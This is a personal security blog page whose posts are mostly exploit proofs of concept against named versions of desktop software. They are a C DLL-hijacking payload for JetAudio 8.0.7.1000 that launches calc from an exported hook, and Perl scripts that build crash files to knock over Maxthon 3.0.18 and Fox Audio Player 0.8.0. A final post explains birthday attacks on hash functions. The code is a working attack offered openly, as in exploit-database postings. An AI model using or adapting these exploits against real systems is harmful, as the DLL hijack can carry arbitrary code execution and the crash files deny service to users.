Showing posts with label Application Vulnerability. Show all posts
Showing posts with label Application Vulnerability. Show all posts

Wednesday, July 13, 2011

JetAudio 8.0.7.1000 DLL Hijacking Exploit

#
#######
#
# Title: JetAudio 8.0.7.1000 DLL Hijacking Exploit
#
# Author: 4n0nym0us (Arash Sa'adatfar)
#
# Developer: Cowon
#
# Version:8.0.7.1000
#
# Vulnerable extensions: mp3,wav,mp4,mpg,swf
#
# Vulnerable Dlls: mfc90enu.dll,mfc90loc.dll,wnaspi32.dll
#
# Tested On: Windows XP Sp3
#
#
#
########

#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }
int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}



http://securityreason.com/exploitalert/10370
Posted by 4n0nym0us at 6:11 AM 0 comments
Labels:

Tuesday, November 2, 2010

Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Maxthon International #
# Version:3.0.18 #
# Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe #
# #
# Tested On: Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
#!/usr/bin/perl
my $file= "Crash.html";
my $junk= "A/" x 10000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {alink: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash.html File Created successfully\n";
close($FILE);

http://www.exploit-db.com/exploits/15394/ 
Posted by 4n0nym0us at 10:17 AM 0 comments
Labels:

Monday, September 27, 2010

Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Leandro Nini #
# #
# Software Link: #
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
 #!/usr/bin/perl
my $file= "Crash.m3u";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u File Created successfully\n";
close($FILE);

http://www.exploit-db.com/exploits/15131/ 
Posted by 4n0nym0us at 11:45 AM 0 comments
Labels:

Wednesday, August 11, 2010

Birthday Attack

Imaging That You Have A Hash Fuction, And It's Name Is "F", Now , f(value), If You Enter "a" As Value, For Example, It Returns "k", Now , There Is No Problem, But , The Problem Causes When Another Value Has The Same Result, For Example, If You Enter Value "z", The Function Again Returns "k", This Is Collision.

Birthday Attack Is A Type Of Cryptographic Attack And Based On Birthday Paradox, A Mathematic Subject, Birthday Attack Is Seems To Be A Kind Of Brute Force Attack, In Which, Attacker Trying To Find Two Different Inputs That Have The Same Output.
Now, The Attacker May Be Able To Bypass The Authentication Or Subvert It.

One Of The Most Famous Birthday Attack Vulnerability Is Tacacs+ Authentication Method.
In This Method, We Can See Two Different Sessions With The Same Session ID.
Posted by 4n0nym0us at 2:43 AM 0 comments
Labels:
Subscribe to: Posts (Atom)